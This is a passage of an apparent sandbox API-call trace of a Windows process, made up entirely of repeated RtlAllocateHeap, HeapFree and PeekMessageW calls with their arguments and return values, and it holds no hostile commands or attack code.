(HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0121.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.094] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.094] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0121.094] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.094] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.095] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0121.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0121.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.095] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0121.095] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0121.095] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.096] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.096] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.096] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0121.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0121.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.096] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.096] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.096] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.096] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.096] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.096] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491978 [0121.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491978 | out: hHeap=0x12c0000) returned 1 [0121.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.097] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.097] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.098] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.098] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0121.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0121.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0121.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.099] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0121.099] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.100] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.100] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.100] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.101] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0121.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0121.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0121.101] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f58 | out: hHeap=0x12c0000) returned 1 [0121.101] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.101] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0121.101] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0121.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.102] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.102] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.102] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.102] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.102] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.102] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.102] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.103] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.103] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.103] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.103] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.103] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0121.103] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0121.103] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.103] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a58 [0121.103] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.103] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a58 | out: hHeap=0x12c0000) returned 1 [0121.103] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0121.103] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0121.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0121.104] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f58 | out: hHeap=0x12c0000) returned 1 [0121.104] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0121.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0121.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.105] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6d0 [0121.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0121.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff438 [0121.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0121.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff230 [0121.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd778 [0121.105] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0121.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0121.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0121.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd838 [0121.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0121.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0121.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0121.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0121.106] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.106] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff050 [0121.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0121.107] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300e00 [0121.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8f8 [0121.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0121.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0121.107] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.107] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.107] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0c8 [0121.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0121.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.108] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0121.108] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0121.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0121.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0121.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0121.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0121.110] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.110] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0121.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0121.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.111] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.111] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.111] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.111] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.111] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.112] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0121.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0121.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0121.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff190 [0121.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6d0 [0121.112] RtlAllocateHeap 